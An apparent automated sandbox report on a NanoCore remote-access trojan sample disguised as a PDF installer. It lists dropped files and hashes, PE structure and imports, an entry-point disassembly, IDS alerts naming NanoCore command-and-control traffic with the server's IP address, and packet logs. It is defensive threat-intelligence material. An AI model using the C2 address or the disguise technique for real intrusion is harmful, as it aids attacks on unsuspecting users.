                                                                    SSDEEP:3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
                                                                    MD5:9E7D0351E4DF94A9B0BADCEB6A9DB963
                                                                    SHA1:76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
                                                                    SHA-256:AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
                                                                    SHA-512:93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
                                                                    Malicious:false
                                                                    Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&

                                                                    C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8
                                                                    Entropy (8bit):3.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:7M:I
                                                                    MD5:E605984DC561B9F47F1CB5768EA0DF06
                                                                    SHA1:3CDBC8C449B53F919F51DA02322134F41B7ECB33
                                                                    SHA-256:026CF8CFDE23BEDCC5E60564D808C492580B9046DD1BDE5B1CF9167852986EA8
                                                                    SHA-512:3520CBDECFEC35785DCE152A84253934AAF3F554C1E74089010E556A9EA1D06EDB5E55D9F94CAB17281B2CD430B46C3FE8CE630D3CEB53C89B599928B1D232C4
                                                                    Malicious:true
                                                                    Preview:t...c..H

                                                                    C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\settings.bin

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):40
                                                                    Entropy (8bit):5.153055907333276
                                                                    Encrypted:false
                                                                    SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                                                                    MD5:4E5E92E2369688041CC82EF9650EDED2
                                                                    SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                                                                    SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                                                                    SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                                                                    Malicious:false
                                                                    Preview:9iH...}Z.4..f.~a........~.~.......3.U.

                                                                    C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\storage.dat

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):426832
                                                                    Entropy (8bit):7.999527918131335
                                                                    Encrypted:true
                                                                    SSDEEP:6144:zKfHbamD8WN+JQYrjM7Ei2CsFJjyh9zvgPonV5HqZcPVT4Eb+Z6no3QSzjeMsdF/:zKf137EiDsTjevgArYcPVLoTQS+0iv
                                                                    MD5:653DDDCB6C89F6EC51F3DDC0053C5914
                                                                    SHA1:4CF7E7D42495CE01C261E4C5C4B8BF6CD76CCEE5
                                                                    SHA-256:83B9CAE66800C768887FB270728F6806CBEBDEAD9946FA730F01723847F17FF9
                                                                    SHA-512:27A467F2364C21CD1C6C34EF1CA5FFB09B4C3180FC9C025E293374EB807E4382108617BB4B97F8EBBC27581CD6E5988BB5E21276B3CB829C1C0E49A6FC9463A0
                                                                    Malicious:false
                                                                    Preview:..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h*...J4*...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.*h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H........*...OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........*X...b*Z...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..

                                                                    C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\task.dat

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):56
                                                                    Entropy (8bit):4.745141646068962
                                                                    Encrypted:false
                                                                    SSDEEP:3:oMty8WbSmm:oMLWumm
                                                                    MD5:F781103B538E4159A8F01E3BE09B1F8D
                                                                    SHA1:27992585DE22A095BABCFD75E8F96710DD921C37
                                                                    SHA-256:BEA91983791C26C19AA411B2870E89AFC250EAF9855B6E1CE7BEA02B74E7F368
                                                                    SHA-512:D50AE0A01E74FC263B704FADE17CDF4993B61E34FD498827D546F090CE2DA5E8F24D4D34FBF360AE7EE5C5E7E3F032F3DDA8AD0C2A2CF0E1DAFEED61258AB4CA
                                                                    Malicious:false
                                                                    Preview:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe

                                                                    \Device\ConDrv

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):182
                                                                    Entropy (8bit):5.07060597644582
                                                                    Encrypted:false
                                                                    SSDEEP:3:RGXKRjN3Mxm8d/AjhclROXDD9jmKXVM8/FOoDamd9xraWMZ4MKLJFcLEWgJya7:zx3M7ucLOdBXVNYmd9NaWM6MKnH5JyY
                                                                    MD5:B08826036A3E81B44E7D8C1284381013
                                                                    SHA1:96CF7E6BC1B55C69CE33BEC3B78FFF4EB8839B87
                                                                    SHA-256:E7AD5092F56BB2ACA26262C361FE5F83171D21AB134D4E5D2EF47E9BF641B549
                                                                    SHA-512:EB9908F6FB6398EDCE4F3B18AA64ABEE8774D1CA3A5B533617C97AAC5E795627CCB8B1176BE64371E6BEF6352004FC2B4862A388D61A6103D05B5B2D02CD0481
                                                                    Malicious:false
                                                                    Preview:Microsoft (R) .NET Framework CasPol 2.0.50727.9149..Copyright (c) Microsoft Corporation. All rights reserved.....ERROR: Invalid option: 0....For usage information, use 'caspol -?'..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.836361315282437
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe
                                                                    File size:348136
                                                                    MD5:91c0c4710db096a4689d40e2ceb3814d
                                                                    SHA1:63880c602b960c5f91e55cbe4d5d18c7b8f1d63a
                                                                    SHA256:a4d4961d124ea4276512c1584f1ebd30951cd469659b3a623594d6361772fae7
                                                                    SHA512:b5fc41a609efb2946ddce21f383b5ae8e70d93b0fd0dec8e48b27f7660569ccdbafe806bf56fc0cd7c4e43826b79f065d57cd66da3c27e865cdced3ca865eb2a
                                                                    SSDEEP:6144:twq3NpWyFr7S0HFwnNHF6pmK2DIuua9ma+T4cX+tTMZP3qtTaPwkYn5inpT4:tzayFfDwNg4RE864c4MZ/c2UinS
                                                                    TLSH:C6741208B548D9A7C9630932ED628AF67ABDDE613BB1A70733006F7C7D312618F45365
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@

                                                                    File Icon

                                                                    Icon Hash:00c4c4dcdcd4d410

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40344a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:4ea4df5d94204fc550be1874e1b77ea7

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    sub esp, 000002D4h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    pop edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+14h], ebx
                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                    mov dword ptr [esp+1Ch], ebx
                                                                    call dword ptr [004080B4h]
                                                                    call dword ptr [004080B0h]
                                                                    cmp ax, 00000006h
                                                                    je 00007F9DD91D3BA3h
                                                                    push ebx
                                                                    call 00007F9DD91D6CFCh
                                                                    cmp eax, ebx
                                                                    je 00007F9DD91D3B99h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 004082B8h
                                                                    push esi
                                                                    call 00007F9DD91D6C76h
                                                                    push esi
                                                                    call dword ptr [0040815Ch]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], 00000000h
                                                                    jne 00007F9DD91D3B7Ch
                                                                    push ebp
                                                                    push 00000009h
                                                                    call 00007F9DD91D6CCEh
                                                                    push 00000007h
                                                                    call 00007F9DD91D6CC7h
                                                                    mov dword ptr [0042A244h], eax
                                                                    call dword ptr [0040803Ch]
                                                                    push ebx
                                                                    call dword ptr [004082A4h]
                                                                    mov dword ptr [0042A2F8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+34h]
                                                                    push 000002B4h
                                                                    push eax
                                                                    push ebx
                                                                    push 004216E8h
                                                                    call dword ptr [00408188h]
                                                                    push 0040A384h
                                                                    push 00429240h
                                                                    call 00007F9DD91D68B0h
                                                                    call dword ptr [004080ACh]
                                                                    mov ebp, 00435000h
                                                                    push eax
                                                                    push ebp
                                                                    call 00007F9DD91D689Eh
                                                                    push ebx
                                                                    call dword ptr [00408174h]
                                                                    add word ptr [eax], 0000h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x19ef0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x61f10x6200False0.6656967474489796data6.477074763411717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x13a40x1400False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x203380x600False0.501953125data3.9745558434885093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x2b0000x3d0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x680000x19ef00x1a000False0.8527644230769231data7.543225711963014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x683a00xbdfcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                    RT_ICON0x741a00x743aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                    RT_ICON0x7b5e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                    RT_ICON0x7db880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                    RT_ICON0x7ec300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x7fad80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x803800x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                    RT_ICON0x809e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                    RT_ICON0x80f500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                    RT_ICON0x813b80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                    RT_ICON0x816a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                    RT_DIALOG0x817c80x100dataEnglishUnited States
                                                                    RT_DIALOG0x818c80x11cdataEnglishUnited States
                                                                    RT_DIALOG0x819e80xc4dataEnglishUnited States
                                                                    RT_DIALOG0x81ab00x60dataEnglishUnited States
                                                                    RT_GROUP_ICON0x81b100xa0dataEnglishUnited States
                                                                    RT_MANIFEST0x81bb00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                    USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                    ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    91.193.75.146192.168.11.203498498572810451 02/04/23-04:02:00.606308TCP2810451ETPRO TROJAN NanoCore RAT Keepalive Response 334984985791.193.75.146192.168.11.20
                                                                    192.168.11.2091.193.75.1464985734982816766 02/04/23-04:02:49.236881TCP2816766ETPRO TROJAN NanoCore RAT CnC 7498573498192.168.11.2091.193.75.146
                                                                    91.193.75.146192.168.11.203498498572810290 02/04/23-04:02:33.039323TCP2810290ETPRO TROJAN NanoCore RAT Keepalive Response 134984985791.193.75.146192.168.11.20
                                                                    192.168.11.2091.193.75.1464985734982025019 02/04/23-03:57:12.109194TCP2025019ET TROJAN Possible NanoCore C2 60B498573498192.168.11.2091.193.75.146
                                                                    91.193.75.146192.168.11.203498498572841753 02/04/23-04:02:50.692460TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)34984985791.193.75.146192.168.11.20
                                                                    192.168.11.2091.193.75.1464985734982816718 02/04/23-04:02:19.821499TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon498573498192.168.11.2091.193.75.146

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Feb 4, 2023 03:57:07.247711897 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.247756958 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.248142004 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.266587973 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.266625881 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.325129986 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.325377941 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.325377941 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.327606916 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.327816963 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.395785093 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.395886898 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.397012949 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.397233009 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.400418043 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.444497108 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.941315889 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.941545963 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.941631079 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.941788912 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.941920042 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:07.942172050 CET44349855142.250.185.110192.168.11.20
                                                                    Feb 4, 2023 03:57:07.942363977 CET49855443192.168.11.20142.250.185.110
                                                                    Feb 4, 2023 03:57:08.066267014 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.066365004 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.066636086 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.066870928 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.066915989 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.109862089 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.110160112 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.110721111 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.110939026 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.110939026 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.114398003 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.114425898 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.114804029 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.114958048 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.115420103 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.156486034 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.428867102 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.429054022 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.429109097 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.429677963 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.429836988 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.429837942 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.430469036 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.430753946 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.431325912 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.431509972 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.431567907 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.431759119 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.433943033 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.434127092 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.434180021 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.434446096 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.436647892 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.436927080 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.437504053 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.437681913 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.437737942 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.437948942 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.438008070 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.438170910 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.438222885 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.438263893 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.438333988 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.438430071 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.438463926 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.438666105 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.438920975 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.439110994 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.439165115 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.439433098 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.439486980 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.439693928 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.439755917 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.439925909 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.439964056 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.440180063 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.440222979 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.440383911 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.440632105 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.440804005 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.440854073 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.441011906 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.441065073 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.441524029 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.441632032 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.441922903 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.441956997 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.442022085 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.442126036 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.442212105 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.442545891 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.442792892 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.442836046 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.442862034 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.443027020 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.443027973 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.443404913 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.443573952 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.443649054 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.443805933 CET49856443192.168.11.20142.250.186.161
                                                                    Feb 4, 2023 03:57:08.443862915 CET44349856142.250.186.161192.168.11.20
                                                                    Feb 4, 2023 03:57:08.444097996 CET49856443192.168.11.20142.250.186.161
